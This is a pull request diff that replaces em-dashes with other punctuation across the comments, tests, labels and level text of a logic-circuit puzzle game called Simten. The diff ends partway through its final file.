### PR TITLE
Remove em-dashes from site copy and docs

### DIFF
--- a/apps/game/src/components/DesktopOnly.tsx
+++ b/apps/game/src/components/DesktopOnly.tsx
@@ -5,7 +5,7 @@ import type { ReactNode } from 'react';
  *
  * CSS-gated, not JS-gated: both branches are present in the SSR markup and the
  * browser picks which to display via Tailwind's `md:` breakpoint. No hydration
- * flicker, and it works before JS arrives — which matters here, because the
+ * flicker, and it works before JS arrives, which matters here, because the
  * thing being gated is a code editor that will not load on the device anyway.
  *
  * Deliberately a copy of the web app's component rather than a shared one. It

--- a/apps/game/src/components/HeaderBar.tsx
+++ b/apps/game/src/components/HeaderBar.tsx
@@ -44,7 +44,7 @@ export function HeaderBar({
       {linkHome ? (
         <Link
           to="/"
-          aria-label="Simten — home"
+          aria-label="Simten home"
           className="flex shrink-0 items-center gap-2 text-foreground no-underline transition-colors hover:text-foreground/80"
         >
           {brand}

--- a/apps/game/src/components/IntroDialog.tsx
+++ b/apps/game/src/components/IntroDialog.tsx
@@ -2,7 +2,7 @@
  * The introduction: what this is, in two sentences.
  *
  * Opens itself on a first visit, and the map's "What is this?" reopens it after
- * that. Controlled from the outside for exactly that reason — the answer to
+ * that. Controlled from the outside for exactly that reason: the answer to
  * "what is this" is already written here, so the header link pointing at
  * simten.dev sent people off the site to read a worse version of it.
  *

--- a/apps/game/src/components/LevelComplete.tsx
+++ b/apps/game/src/components/LevelComplete.tsx
@@ -1,8 +1,8 @@
 /**
  * The moment a level is finished.
  *
- * Deliberately arrives *after* the victory run, not instead of it. The run —
- * switches flipping, lamp following the truth table — is the proof; this is the
+ * Deliberately arrives *after* the victory run, not instead of it. The run
+ * (switches flipping, lamp following the truth table) is the proof; this is the
  * receipt. Opening a dialog over a circuit still demonstrating itself would
  * step on the better of the two.
  *
@@ -38,7 +38,7 @@ export function LevelComplete({ open, onOpenChange, level, next }: LevelComplete
    * joins.
    *
    * Both derived, so the card can only ever name something the grader accepts
-   * and the editor offers — a hardcoded "unlocked!" would be a promise the game
+   * and the editor offers; a hardcoded "unlocked!" would be a promise the game
    * does not keep.
    */
   const unlocked = gatesGainedAfter(level, next);
@@ -61,19 +61,19 @@ export function LevelComplete({ open, onOpenChange, level, next }: LevelComplete
 
         {/* The body doubles as the dialog's accessible description. Radix warns
             when a DialogContent has none, and this is the text that describes
-            it — a separate sr-only line would say the same thing twice. */}
+            it, since a separate sr-only line would say the same thing twice. */}
         <DialogDescription className="mt-4 text-sm leading-relaxed text-muted-foreground">
           {level.outro.body}
         </DialogDescription>
 
         {/* What you leave with, as things rather than a sentence about things.
             The row grows by one on each of the first seven levels, so the
-            reward is watching the set fill up — which a line of prose saying
+            reward is watching the set fill up, which a line of prose saying
             "Xor unlocked" cannot do.
 
             Only when a gate actually changed hands. Levels that add none used
             to show `level.target` here to keep every card the same shape, which
-            meant printing "You built Toggle1" — a variable name, and no answer
+            meant printing "You built Toggle1", a variable name, and no answer
             to a question anyone was asking. A missing block is better than a
             block with nothing in it. */}
         {gained && (
@@ -98,8 +98,8 @@ export function LevelComplete({ open, onOpenChange, level, next }: LevelComplete
           </div>
         )}
 
-        {/* One action. Going back to the circuit to beat par is still there —
-            the dialog closes on its X, on Escape and on a click outside — but
+        {/* One action. Going back to the circuit to beat par is still there,
+            the dialog closes on its X, on Escape and on a click outside, but
             it does not need a button competing with the only thing most people
             want at this point, which is the next level. */}
         <DialogFooter className="mt-6 gap-2">
@@ -114,8 +114,8 @@ export function LevelComplete({ open, onOpenChange, level, next }: LevelComplete
           ) : (
             /* End of the campaign, and the highest-intent moment the game
                gets. Sending them back to a map of levels they have already
-               solved wastes it. `/circuit` opens on the example catalog —
-               Snake, a RISC-V computer, npm output baked into a ROM — so the
+               solved wastes it. `/circuit` opens on the example catalog:
+               Snake, a RISC-V computer, npm output baked into a ROM, so the
                next thing they see is the range, and they pick. */
             <a
               href="https://simten.dev/circuit"

--- a/apps/game/src/components/LevelDrilldown.tsx
+++ b/apps/game/src/components/LevelDrilldown.tsx
@@ -2,7 +2,7 @@
  * The drilldown.
  *
  * Double-clicking the badge on a level opens its circuit in
- * `CompositeInspectorDialog` — the same inspector the canvas opens when you
+ * `CompositeInspectorDialog`, the same inspector the canvas opens when you
  * double-click a composite component, so it arrives with a full-size canvas,
  * its own simulation engine, breadcrumbs and nested drill-down already working.
  *
@@ -13,7 +13,7 @@
  *
  * It draws the player's own circuit, which is the point of the feature: your
  * work, at your gate count, rather than a spoiler. The draft is the right
- * source rather than a passing snapshot — the drilldown *shows* your circuit,
+ * source rather than a passing snapshot; the drilldown *shows* your circuit,
  * it does not depend on it, so a solved level you have since edited should
  * appear as you left it. Levels never opened fall back to the reference answer,
  * because a map where most cards inspect to nothing is worse than one that
@@ -38,7 +38,7 @@ export interface LevelDrilldownProps {
 export function LevelDrilldown({ level, draft, expanded, onCloseExpanded }: LevelDrilldownProps) {
   const source = draft ?? SOLUTIONS[level.id];
 
-  // `select` is a picker over the compiled circuits, not a name — the default
+  // `select` is a picker over the compiled circuits, not a name; the default
   // takes the last circuit defined. Same shape the level page uses.
   const select = useCallback(
     (circuits: { name: string }[]) =>
@@ -54,7 +54,7 @@ export function LevelDrilldown({ level, draft, expanded, onCloseExpanded }: Leve
 
   /**
    * The inspector's drill-down stack. Seeded with this level's circuit when
-   * expanded, then owned by the dialog — pushing goes deeper into a composite,
+   * expanded, then owned by the dialog; pushing goes deeper into a composite,
    * popping comes back out, and an empty stack is what "closed" means to it.
    */
   const [stack, setStack] = useState<InspectorFrame[]>([]);

--- a/apps/game/src/components/LevelIntro.tsx
+++ b/apps/game/src/components/LevelIntro.tsx
@@ -7,7 +7,7 @@
  * controls that appear for the first time in the campaign. Everything else in
  * the game is discoverable by reading the diagram; that is not.
  *
- * Shown before the level rather than after, unlike `LevelComplete` — this is
+ * Shown before the level rather than after, unlike `LevelComplete`; this is
  * the thing you need in order to start.
  */
 
@@ -25,7 +25,7 @@ import type { Level } from '../game/types';
  * `**bold**`, and nothing else.
  *
  * A level is data that could be fetched as plain JSON, so its copy stays a
- * string rather than becoming markup — but the two words this dialog exists to
+ * string rather than becoming markup, but the two words this dialog exists to
  * teach deserve to stand out from the paragraph explaining them. One delimiter,
  * parsed here, is cheaper than a markdown dependency and cannot grow into one
  * by accident.

--- a/apps/game/src/components/LevelMap.tsx
+++ b/apps/game/src/components/LevelMap.tsx
@@ -6,7 +6,7 @@
  * make it look small, and panning up through work you have not done yet is
  * most of what a map is for.
  *
- * Nodes are not draggable. This is a map, not an editor — the layout carries
+ * Nodes are not draggable. This is a map, not an editor; the layout carries
  * meaning, so letting a player rearrange it only lets them break it.
  */
 
@@ -50,7 +50,7 @@ type LevelNode = Node<LevelNodeView, 'level'>;
 /**
  * Whether the circuit's verdict is allowed to actually lock a level.
  *
- * On, now that progress persists — the map computes unlock state by running
+ * On, now that progress persists; the map computes unlock state by running
  * itself as a circuit (see `map-circuit.ts`), and a campaign where every level
  * is open from the start has no shape and no reason to care about the unlock
  * line the arithmetic band earns.
@@ -67,7 +67,7 @@ const ENFORCE_LOCKING = true;
  *
  * `WIRE_COLORS` in `packages/ui/src/editor/types/visual.ts`: a live signal is
  * green-500, a low one slate-400, and the canvas draws every wire at
- * `strokeWidth: 2` without animation. Matching is not only cosmetic — the map
+ * `strokeWidth: 2` without animation. Matching is not only cosmetic; the map
  * *is* a circuit, so a wire leaving a solved level carries a real 1, and it
  * should be the same green a 1 is everywhere else in the product.
  */
@@ -82,7 +82,7 @@ const WIRE_LOW = '#3f4756';
 
 /**
  * Ports, sized and coloured here rather than left to React Flow, whose default
- * handle is a white-bordered dot — the loudest thing on the map, repeated
+ * handle is a white-bordered dot, the loudest thing on the map, repeated
  * twice per level.
  */
 const PORT_STYLE = { width: 6, height: 6, background: '#475569', border: 'none' } as const;
@@ -90,7 +90,7 @@ const PORT_STYLE = { width: 6, height: 6, background: '#475569', border: 'none' 
  * Three states that have to be told apart at a glance, so each gets its own
  * shape rather than its own opacity. `available` and `locked` used to differ
  * only by how faint they were, which on a dark map is a difference you notice
- * by comparing two cards side by side — not by looking at one.
+ * by comparing two cards side by side, not by looking at one.
  *
  * Solid bright border is the one you can play, dashed and faint is the one you
  * cannot yet, filled green is done. Dashed carries "not yet" without borrowing
@@ -145,14 +145,14 @@ function LevelMapNode({ data }: NodeProps<LevelNode>) {
             </Link>
             {/*
               The same badge the canvas puts on a composite component, carrying
-              the same gesture and the same tooltip — so "there is something
+              the same gesture and the same tooltip, so "there is something
               inside this" is a thing you can see rather than a thing you have
               to guess. It sits outside the Link deliberately: clicking the card
               still opens the level, and inspecting is its own target.
 
               Solved levels only. On an unsolved one there is nothing of the
               player's to show, so the drilldown falls back to the reference
-              answer — which hands over the solution to a level they have not
+              answer, which hands over the solution to a level they have not
               attempted. The badge is the affordance, so removing it is what
               removes the spoiler.
 
@@ -263,7 +263,7 @@ function LevelMapCanvas({ solved, onHoverLevel, onExpandLevel }: LevelMapCanvasP
   const flowEdges = useMemo<Edge[]>(
     () =>
       edges.map((e) => {
-        // A wire is hot when the level driving it is solved — the same fact the
+        // A wire is hot when the level driving it is solved, the same fact the
         // simulator used to decide what the gates above it see.
         const hot = live.has(e.source);
         return {
@@ -283,7 +283,7 @@ function LevelMapCanvas({ solved, onHoverLevel, onExpandLevel }: LevelMapCanvasP
   /**
    * Put the start of the campaign back under the viewport.
    *
-   * Used for the initial view and by the recenter control — the map is larger
+   * Used for the initial view and by the recenter control; the map is larger
    * than the screen and pans freely, so it is possible to end up looking at
    * empty grid with no way to tell which direction the levels are in.
    */
@@ -314,7 +314,7 @@ function LevelMapCanvas({ solved, onHoverLevel, onExpandLevel }: LevelMapCanvasP
   /**
    * Hold the first paint until the map has been positioned.
    *
-   * React Flow paints once at its default viewport — origin, zoom 1 — which
+   * React Flow paints once at its default viewport (origin, zoom 1) which
    * puts the graph in the top-left corner, and only then does `onInit` fire and
    * centre it. The result is a visible jump from wrong place to right place.
    * Centring earlier is not possible: it needs the container's measured size,

--- a/apps/game/src/components/Logo.tsx
+++ b/apps/game/src/components/Logo.tsx
@@ -7,7 +7,7 @@
  * wordmark in it would make brand art permanent public API for the benefit of
  * two apps we control.
  *
- * If the mark ever changes it has to change in three places — here, `apps/web`,
+ * If the mark ever changes it has to change in three places: here, `apps/web`,
  * and the static `favicon.svg` in both `public/` directories, which the browser
  * fetches directly and cannot import from React.
  */

--- a/apps/game/src/components/SpecPanel.tsx
+++ b/apps/game/src/components/SpecPanel.tsx
@@ -17,7 +17,7 @@ import { TruthTable } from './TruthTable';
 
 interface SpecPanelProps {
   level: Level;
-  /** Read for the failing column only — the table is the whole verdict now. */
+  /** Read for the failing column only; the table is the whole verdict now. */
   result: GradeResult | null;
   /** Row currently being driven through the circuit by the victory run. */
   activeRow: number | null;
@@ -34,7 +34,7 @@ function Heading({ children }: { children: React.ReactNode }) {
 }
 
 /**
- * What went wrong, in a sentence — for the failures a truth table cannot say.
+ * What went wrong, in a sentence, for the failures a truth table cannot say.
  *
  * A red column expresses "your circuit computes the wrong thing" better than
  * prose does, so `vector` returns null and the table keeps that job. The other
@@ -42,7 +42,7 @@ function Heading({ children }: { children: React.ReactNode }) {
  * the level forbids, or never ran. Those used to submit in silence, which read
  * as a broken button.
  *
- * Everything here comes off the failure itself — `GradeFailure` was written to
+ * Everything here comes off the failure itself; `GradeFailure` was written to
  * carry what the player needs to fix it, and then nothing displayed it.
  */
 function explain(result: GradeResult | null): string | null {

--- a/apps/game/src/components/ThemeToggle.tsx
+++ b/apps/game/src/components/ThemeToggle.tsx
@@ -71,8 +71,8 @@ export default function ThemeToggle() {
    * appeared to need two clicks. Choosing from `resolved` rather than `mode`
    * guarantees every press changes the thing the button is depicting.
    *
-   * `auto` is still honoured when it is already stored — the media listener
-   * above keeps following the system — but the toggle only ever writes an
+   * `auto` is still honoured when it is already stored; the media listener
+   * above keeps following the system, but the toggle only ever writes an
    * explicit choice, because that is the only thing it can show.
    */
   function toggleMode() {
@@ -95,7 +95,7 @@ export default function ThemeToggle() {
       {/*
         The same signal mark simten.dev uses: a line held low for dark, a pulse
         held high for light. Drawn from the *resolved* appearance rather than
-        the mode, so it always depicts what you are looking at — `auto` has no
+        the mode, so it always depicts what you are looking at; `auto` has no
         third waveform, and the mode is on the tooltip where it belongs.
       */}
       <svg

--- a/apps/game/src/components/TruthTable.tsx
+++ b/apps/game/src/components/TruthTable.tsx
@@ -1,7 +1,7 @@
 /**
  * The level's vectors, laid out horizontally.
  *
- * Signals run down the left and each vector is a column — the transpose of how
+ * Signals run down the left and each vector is a column, the transpose of how
  * a truth table is usually written. It suits where this now lives, a wide and
  * short sheet, where the conventional layout would be a tall narrow strip with
  * dead space either side.
@@ -16,7 +16,7 @@
  * It doubles as the scoreboard. The column being driven through the circuit is
  * highlighted, columns already shown correct go green, and a failing column
  * goes red. The colour lands on the numbers themselves rather than on a row of
- * ticks above them — one less row to align against, and the verdict reads on
+ * ticks above them: one less row to align against, and the verdict reads on
  * the thing it is a verdict about.
  */
 
@@ -32,7 +32,7 @@ interface TruthTableProps {
    * The vector that failed, if one did.
    *
    * The grader stops at the first wrong row, so everything left of this is
-   * known good and everything right of it is simply untested — which is why
+   * known good and everything right of it is simply untested, which is why
    * only this one column goes red.
    */
   failed?: number | null;
@@ -43,7 +43,7 @@ interface TruthTableProps {
  * is testable without a DOM.
  *
  * `level.inputs` is a list of signal names. It used to be a map, and this was
- * `Object.keys(level.inputs)` — which on an array returns its indices, so the
+ * `Object.keys(level.inputs)`, which on an array returns its indices, so the
  * table silently rendered headers `0`, `1` and then looked up `v.inputs['0']`
  * for every cell and found nothing. `Object.keys` on an array is legal
  * TypeScript, so nothing failed; the table just went blank.

--- a/apps/game/src/game/__tests__/level-name.test.ts
+++ b/apps/game/src/game/__tests__/level-name.test.ts
@@ -2,7 +2,7 @@
  * The name warning has to fire while you type, not on Submit.
  *
  * Renaming the circuit used to empty the canvas and say nothing until you
- * submitted — the only way to learn the rule was to trip over it. These cover
+ * submitted; the only way to learn the rule was to trip over it. These cover
  * the cases that decide whether the warning is helpful or just noise.
  */
 
@@ -28,7 +28,7 @@ describe('nameDiagnostics', () => {
     expect(d.line).toBe(1);
   });
 
-  it('is a warning, never an error — the code is valid', () => {
+  it('is a warning, never an error, the code is valid', () => {
     const ds = nameDiagnostics(`circuit('Nope', {})`, 'And1');
     expect(ds.every((d) => d.severity === 'warning')).toBe(true);
   });

--- a/apps/game/src/game/__tests__/levels.test.ts
+++ b/apps/game/src/game/__tests__/levels.test.ts
@@ -4,10 +4,10 @@
  * A level is only shippable if two things hold, and neither is obvious from
  * reading it:
  *
- *   solvable    — a reference solution passes. Catches a level whose stated
+ *   solvable    : a reference solution passes. Catches a level whose stated
  *                 signals, allowed primitives and truth table cannot all be
  *                 satisfied at once.
- *   not vacuous — degenerate answers fail. Catches the tautological grader,
+ *   not vacuous : degenerate answers fail. Catches the tautological grader,
  *                 where a truth table is so thin that returning a constant
  *                 passes it. That bug is invisible in the "solvable" direction,
  *                 which is exactly why it needs its own test.
@@ -30,7 +30,7 @@ import { localRuntime } from './local-runtime';
 
 /**
  * A degenerate answer: the right signals, no real logic. Wires a Constant
- * straight to the output, so it also exercises the forbidden-primitive path —
+ * straight to the output, so it also exercises the forbidden-primitive path,
  * no level allows a Constant.
  */
 function constantSolution(level: Level, value: 0 | 1): string {
@@ -66,7 +66,7 @@ describe('every level has a reference solution', () => {
 });
 
 describe.each(LEVELS.map((l) => [l.id, l] as const))('%s', (id, level) => {
-  it('is solvable — the reference solution passes', async () => {
+  it('is solvable, and the reference solution passes', async () => {
     const result = await grade(localRuntime(), level, SOLUTIONS[id]);
     // Surface the actual failure rather than a bare `false`.
     expect(result.status === 'pass' ? 'pass' : JSON.stringify(result)).toBe('pass');
@@ -76,7 +76,7 @@ describe.each(LEVELS.map((l) => [l.id, l] as const))('%s', (id, level) => {
    * Equality, not `<=`. A par looser than the reference solution passes a `<=`
    * check while quietly promising the player a target they beat by default,
    * which is how four levels ended up carrying pars from before gates unlocked
-   * progressively — `xnor` advertised 5 when XOR plus a NOT does it in 2. If
+   * progressively; `xnor` advertised 5 when XOR plus a NOT does it in 2. If
    * this fails, either the reference solution got cheaper and par should follow,
    * or par moved and the reference solution has not caught up.
    */
@@ -87,7 +87,7 @@ describe.each(LEVELS.map((l) => [l.id, l] as const))('%s', (id, level) => {
     if (level.par !== undefined) expect(result.gates).toBe(level.par);
   });
 
-  it.each([0, 1] as const)('is not vacuous — a constant %i answer fails', async (value) => {
+  it.each([0, 1] as const)('is not vacuous, so a constant %i answer fails', async (value) => {
     const result = await grade(localRuntime(), level, constantSolution(level, value));
     expect(result.status).toBe('fail');
   });
@@ -141,7 +141,7 @@ describe('the score counts only permitted primitives', () => {
     if (!level) throw new Error('level missing');
     const result = await grade(localRuntime(), level, SOLUTIONS['first-wire']);
     if (result.status !== 'pass') throw new Error(JSON.stringify(result));
-    // Two switches, one lamp, one gate — the score is 1.
+    // Two switches, one lamp, one gate, so the score is 1.
     expect(result.gates).toBe(1);
   });
 });
@@ -173,7 +173,7 @@ describe('level definitions', () => {
      * A combinational level lists every input combination, so no circuit
      * without memory can fake it. A sequential level lists a chosen handful,
      * and a short enough sequence can be satisfied by some function of the
-     * inputs alone — which would make a level about memory passable without
+     * inputs alone, which would make a level about memory passable without
      * any. The proof it is not: the same inputs appear twice expecting
      * different answers. No function of the inputs can do that.
      */
@@ -201,7 +201,7 @@ describe('level definitions', () => {
 
   it('all carry completion copy', () => {
     // The dialog reads straight from this, so a level without it finishes on
-    // an empty headline — and the failure would only show on a solve.
+    // an empty headline, and the failure would only show on a solve.
     for (const level of LEVELS) {
       expect(level.outro.headline.trim().length).toBeGreaterThan(0);
       expect(level.outro.body.trim().length).toBeGreaterThan(0);

--- a/apps/game/src/game/__tests__/local-runtime.ts
+++ b/apps/game/src/game/__tests__/local-runtime.ts
@@ -8,7 +8,7 @@
  *
  * It goes to the engine rather than the friendlier `simulate()` handle because
  * that handle's `get(name)` resolves a top-level port and otherwise falls back
- * to *any* port key ending in `.name` — which is ambiguous the moment gates
+ * to *any* port key ending in `.name`, which is ambiguous the moment gates
  * have their own `a`/`b`/`in` ports. Reading an `Led` named `out` means reading
  * exactly `out.in`, so the raw port map is what is needed.
  *
@@ -55,7 +55,7 @@ export function localRuntime(): GradeRuntime {
       for (const [name, value] of Object.entries(inputs)) engine.setNode(name, value);
       // A clock cycle, because that is what the browser does: `sandboxRuntime`
       // grades through `sandbox.tick`. This used `runCombinational`, which
-      // settles the logic without advancing a clock — the two agreed on every
+      // settles the logic without advancing a clock; the two agreed on every
       // combinational level and silently disagreed on anything clocked, so a
       // level that graded correctly in the browser could never pass CI. A
       // latch hides the difference, being combinational feedback; a flip-flop

--- a/apps/game/src/game/__tests__/map-circuit.test.ts
+++ b/apps/game/src/game/__tests__/map-circuit.test.ts
@@ -3,7 +3,7 @@
  *
  * These assert the circuit *computes* unlock state rather than that some code
  * beside it does. If `simulateMap` were quietly replaced by a loop over
- * `MAP_ROWS`, every one of these would still pass — which is fine, because what
+ * `MAP_ROWS`, every one of these would still pass, which is fine, because what
  * they actually pin down is the behaviour the page depends on: solving a level
  * lights the next one, and nothing further along lights early.
  */

--- a/apps/game/src/game/__tests__/map.test.ts
+++ b/apps/game/src/game/__tests__/map.test.ts
@@ -4,7 +4,7 @@
  * `MAP_ROWS` names levels by id in a separate file from `LEVELS`, which buys
  * layout freedom and costs the possibility of the two disagreeing. A level
  * added to the campaign but not the map would simply never appear on the map,
- * and nothing at runtime would say so — `buildMapGraph` skips unknown ids
+ * and nothing at runtime would say so; `buildMapGraph` skips unknown ids
  * rather than crashing the page, which is right for a player and useless for
  * an author. This is where that gets caught instead.
  */
@@ -31,7 +31,7 @@ describe('the graph it builds', () => {
     expect(nodes.map((n) => n.id).sort()).toEqual(LEVELS.map((l) => l.id).sort());
   });
 
-  it('reads bottom to top — the first level sits lowest', () => {
+  it('reads bottom to top, and the first level sits lowest', () => {
     const { nodes } = buildMapGraph();
     const byId = new Map(nodes.map((n) => [n.id, n]));
     const first = byId.get(MAP_ROWS[0][0]);

--- a/apps/game/src/game/__tests__/permitted.test.ts
+++ b/apps/game/src/game/__tests__/permitted.test.ts
@@ -1,7 +1,7 @@
 /**
  * The editor, the canvas and the grader must permit exactly the same set.
  *
- * They used to compose `allowed ∪ STRUCTURAL` separately — the editor built its
+ * They used to compose `allowed ∪ STRUCTURAL` separately; the editor built its
  * ambient globals from one copy, the grader checked the netlist against another.
  * Two copies of a rule is how you get a level that autocompletes a gate and then
  * rejects it on Submit. `permittedFor` is now the only definition; this pins it.
@@ -29,7 +29,7 @@ describe('permittedFor', () => {
   /**
    * The property that matters: anything the editor puts in scope must survive
    * the grader. If these drift, a player writes something the editor offered
-   * and Submit refuses it — with no way to tell which is right.
+   * and Submit refuses it, with no way to tell which is right.
    */
   it('accepts every primitive the editor puts in scope', () => {
     for (const level of LEVELS) {

--- a/apps/game/src/game/__tests__/runtime.test.ts
+++ b/apps/game/src/game/__tests__/runtime.test.ts
@@ -5,7 +5,7 @@
  * top-level ports under `__top__.` while `@simten/core/sim` returns them bare,
  * and because the interface never said which, the sandbox adapter shipped the
  * prefixed keys straight through. Grading then read `undefined` for every
- * output and, thanks to a `?? 0` fallback, scored it 0 — which silently passes
+ * output and, thanks to a `?? 0` fallback, scored it 0, which silently passes
  * every truth-table row that expects 0. Three of the four rows in a two-input
  * AND expect 0, so it looked like one stubborn failing case rather than a
  * grader that never read anything.

--- a/apps/game/src/game/__tests__/storage.test.ts
+++ b/apps/game/src/game/__tests__/storage.test.ts
@@ -1,7 +1,7 @@
 /**
  * The storage layer, driven through a fake `window`.
  *
- * The suite runs in the node environment — see `vitest.config.ts` — so there is
+ * The suite runs in the node environment (see `vitest.config.ts`) so there is
  * no `localStorage` and, more usefully, no `window` at all. That is exactly the
  * condition the module's SSR guard exists for, so the absent case is tested by
  * simply not installing the stub.
@@ -117,7 +117,7 @@ describe('progress', () => {
     expect(PROGRESS_KEY).toBe('simten:game:progress');
   });
 
-  it('carries no source — the map needs a flag and a score, nothing more', () => {
+  it('carries no source; the map needs a flag and a score, nothing more', () => {
     installStorage();
     writeProgress('first-wire', { gates: 1 });
     expect(Object.keys(readProgress()['first-wire'])).toEqual(['gates']);

--- a/apps/game/src/game/__tests__/truth-table.test.ts
+++ b/apps/game/src/game/__tests__/truth-table.test.ts
@@ -2,7 +2,7 @@
  * The truth table has to read the level shape correctly.
  *
  * When levels moved from `Record<string, PortSpec>` to a list of signal names,
- * the table kept doing `Object.keys(level.inputs)` — which on an array returns
+ * the table kept doing `Object.keys(level.inputs)`, which on an array returns
  * indices. It rendered headers `0`, `1`, `0` and blank cells, and neither
  * TypeScript nor the suite noticed, because `Object.keys` on an array is
  * perfectly legal and nothing rendered the component.

--- a/apps/game/src/game/grade.ts
+++ b/apps/game/src/game/grade.ts
@@ -12,8 +12,8 @@
  * and a forbidden primitive is worth reporting even when the answer is correct,
  * so both are settled before anything is simulated.
  *
- * Where the player's code executes is the runtime's business, not this file's
- * — see `runtime.ts`. In the browser it is the sandbox iframe, never this frame.
+ * Where the player's code executes is the runtime's business, not this file's;
+ * see `runtime.ts`. In the browser it is the sandbox iframe, never this frame.
  */
 
 import type { Circuit, FlatCircuit } from '@simten/core';
@@ -26,7 +26,7 @@ import type { GradeFailure, GradeResult, Level } from './types';
  * explicitly. `Switch`/`Led` are how a self-contained level gets its signals;
  * `Input`/`Output` are the port-based equivalent.
  *
- * They need no exemption from the *score* — that is counted positively from
+ * They need no exemption from the *score*; that is counted positively from
  * the level's `allowed` list, so anything absent from it simply does not count.
  * A mistake here therefore fails loudly (a valid solution is rejected with
  * "not available here") rather than quietly skewing par.
@@ -37,7 +37,7 @@ import type { GradeFailure, GradeResult, Level } from './types';
 export const STRUCTURAL = new Set(['Switch', 'Led', 'Input', 'Output', 'HexDisplay']);
 
 /**
- * Does the circuit expose this signal — as a top-level port, or as a node of
+ * Does the circuit expose this signal, either as a top-level port or as a node of
  * that name? Both shapes are valid; which one a level uses is a curriculum
  * decision, not something the grader needs to know.
  */
@@ -61,7 +61,7 @@ function interfaceProblems(circuit: Circuit, level: Level): string[] {
  * Everything a level lets you place: its own gates, plus the structural pieces
  * that carry no logic.
  *
- * One definition, three consumers — the editor's ambient globals, the canvas
+ * One definition, three consumers: the editor's ambient globals, the canvas
  * preview, and this grader. They were each composing `allowed ∪ STRUCTURAL`
  * separately, which is how an editor that autocompletes a gate the grader then
  * rejects comes about. `__tests__/permitted.test.ts` pins that they agree.
@@ -140,7 +140,7 @@ export async function grade(
       for (const [port, want] of Object.entries(vector.expect)) {
         const got = ports[port];
         // Deliberately not `?? 0`. A signal the runtime cannot read is a broken
-        // runtime, not an output of zero — and defaulting it silently passes
+        // runtime, not an output of zero, and defaulting it silently passes
         // every row that happens to expect 0, which is most of them.
         if (got === undefined) {
           return {

--- a/apps/game/src/game/level-name.ts
+++ b/apps/game/src/game/level-name.ts
@@ -1,7 +1,7 @@
 /**
  * Telling the player, immediately, that their circuit is not the one being graded.
  *
- * A level grades a circuit with a specific name — the same contract LeetCode
+ * A level grades a circuit with a specific name, the same contract LeetCode
  * and Codewars use, where the signature is fixed and the body is yours. The
  * problem was never the rule, it was the silence: renaming the circuit emptied
  * the canvas and said nothing until Submit, so the only way to learn the rule
@@ -28,7 +28,7 @@ export interface NameDiagnostic {
  * Deliberately a warning, not an error: the code is valid and the circuit may
  * be perfectly correct. It just is not the one that will be marked.
  *
- * Silent when the source declares no circuit at all — that is someone
+ * Silent when the source declares no circuit at all; that is someone
  * mid-keystroke, and nagging them about a name is not help.
  */
 export function nameDiagnostics(source: string, target: string): NameDiagnostic[] {
@@ -40,7 +40,7 @@ export function nameDiagnostics(source: string, target: string): NameDiagnostic[
   return sites.map((s) => ({
     message:
       `This level grades a circuit called \`${target}\`, and this one is called \`${s.name}\`. ` +
-      `Rename it to \`${target}\` — the rest is yours. (Found: ${found}.)`,
+      `Rename it to \`${target}\`. The rest is yours. (Found: ${found}.)`,
     line: s.line,
     column: s.column,
     endColumn: s.endColumn,

--- a/apps/game/src/game/levels.ts
+++ b/apps/game/src/game/levels.ts
@@ -9,7 +9,7 @@
  * Level 8 introduces ports, and the black box that comes with them is the
  * lesson rather than a wart: your circuit collapses into a single component
  * precisely because its insides have stopped being anyone else's problem. It
- * is also the gate to composition — a self-contained circuit cannot be reused,
+ * is also the gate to composition: a self-contained circuit cannot be reused,
  * so nothing later can build on your XOR until you have wrapped it.
  *
  * The middle of the act follows NAND → NOT → AND → OR → NOR → XOR → XNOR. Each
@@ -18,18 +18,18 @@
  * the middle where there is enough behind it for the trick to mean something.
  *
  * Stubs taper. Level 1 is written out in full with two wires commented out,
- * because its job is to explain the `connect` destructuring — the hardest thing
- * in the DSL to read cold — and uncommenting a line someone can already see
+ * because its job is to explain the `connect` destructuring (the hardest thing
+ * in the DSL to read cold) and uncommenting a line someone can already see
  * working asks less of them than writing one from a blank list. Levels 2 and 3 still place a NAND and wire one side of it. From level 4
- * the `nodes` are the player's to choose — handing them the right number of
+ * the `nodes` are the player's to choose; handing them the right number of
  * NANDs would give away both the answer and the point of `par`.
  *
  * Level 1 is a NAND rather than a friendlier AND, even though its lesson is
  * pure syntax. "You get one gate" has to be true from the first screen: handing
  * over an AND and withdrawing it a level later reads as a confiscation, and it
  * made the completion card announce NAND as an unlock when it was really a
- * swap. Nothing is reasoned about here anyway — you uncomment two lines and
- * click — so the player meets NAND by watching it, which is exactly the setup
+ * swap. Nothing is reasoned about here anyway (you uncomment two lines and
+ * click) so the player meets NAND by watching it, which is exactly the setup
  * level 2 needs.
  */
 
@@ -40,13 +40,13 @@ import type { Level } from './types';
  *
  * Every gate the player built from NAND, handed back once they have proved they
  * can make it. This is the first time `allowed` grows, which is what makes the
- * completion card's unlock line fire — it is derived from exactly this
+ * completion card's unlock line fire; it is derived from exactly this
  * difference, so it can never promise something the grader would reject.
  *
  * The honest version of this is reusing the circuits they actually wrote, which
  * needs composition. Until then the stdlib equivalents stand in: same logic,
- * same gate counts, and the lesson — that what you build makes the next thing
- * cheaper — survives intact.
+ * same gate counts, and the lesson, that what you build makes the next thing
+ * cheaper, survives intact.
  */
 const ARITHMETIC_GATES = ['Nand', 'Not', 'And', 'Or', 'Nor', 'Xor', 'Xnor'];
 
@@ -64,7 +64,7 @@ export const LEVELS: Level[] = [
     stub: `// A circuit is a set of nodes and the wires between them.
 // \`x.to(y)\` sends the value at x into y.
 //
-// Everything here is a node — the switches and the lamp too. The first
+// Everything here is a node, the switches and the lamp too. The first
 // wire is already connected. The other two are written out for you, just
 // commented.
 
@@ -101,7 +101,7 @@ export default circuit('Nand1', {
     title: 'NOT',
     tagline: 'Turn a 1 into a 0.',
     brief:
-      'You have seen what NAND does: it outputs 0 only when both its inputs are 1. It is the only gate you get, so every other gate gets built from it. Start with the simplest — turn a 1 into a 0.',
+      'You have seen what NAND does: it outputs 0 only when both its inputs are 1. It is the only gate you get, so every other gate gets built from it. Start with the simplest: turn a 1 into a 0.',
     target: 'Not1',
     inputs: ['a'],
     outputs: ['result'],
@@ -264,7 +264,7 @@ export default circuit('Nor1', {
     title: 'XOR',
     tagline: 'Light the lamp when the switches disagree.',
     brief:
-      'Light the lamp when the two switches disagree. This is the one that takes a minute — and it is the gate an adder is built from, so it pays off twice.',
+      'Light the lamp when the two switches disagree. This is the one that takes a minute, and it is the gate an adder is built from, so it pays off twice.',
     target: 'Xor1',
     inputs: ['a', 'b'],
     outputs: ['result'],
@@ -348,7 +348,7 @@ export default circuit('Xnor1', {
